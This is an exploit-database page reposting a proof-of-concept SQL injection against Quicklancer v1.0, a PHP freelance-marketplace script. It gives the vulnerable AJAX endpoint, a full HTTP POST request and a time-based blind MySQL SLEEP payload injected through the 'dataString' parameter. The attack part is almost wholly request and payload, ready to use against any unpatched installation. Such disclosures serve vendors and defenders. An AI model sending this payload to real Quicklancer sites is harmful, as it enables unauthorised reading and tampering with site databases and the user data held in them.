Advertisement






Quicklancer v1.0 SQL Injection

CVE Category Price Severity
N/A CWE-89 Unknown Unknown
Author Risk Exploitation Type Date
Unknown High Remote 2023-05-27
CVSS
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023050064

Below is a copy:

Quicklancer v1.0 SQL Injection
# Exploit Title: Quicklancer v1.0 - SQL Injection
# Date: 2023-05-17
# Exploit Author: Ahmet mit BAYRAM
# Vendor:
https://codecanyon.net/item/quicklancer-freelance-marketplace-php-script/39087135
# Demo Site: https://quicklancer.bylancer.com
# Tested on: Kali Linux
# CVE: N/A


### Request ###

POST /php/user-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
x-requested-with: XMLHttpRequest
Referer: https://localhost
Cookie: sec_session_id=12bcd985abfc52d90489a6b5fd8219b2;
quickjob_view_counted=31; Quick_lang=arabic
Content-Length: 93
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive

action=searchStateCountry&dataString=deneme


### Parameter & Payloads ###

Parameter: dataString (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=searchStateCountry&dataString=deneme' AND (SELECT 8068
FROM (SELECT(SLEEP(5)))qUdx) AND 'nbTo'='nbTo

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.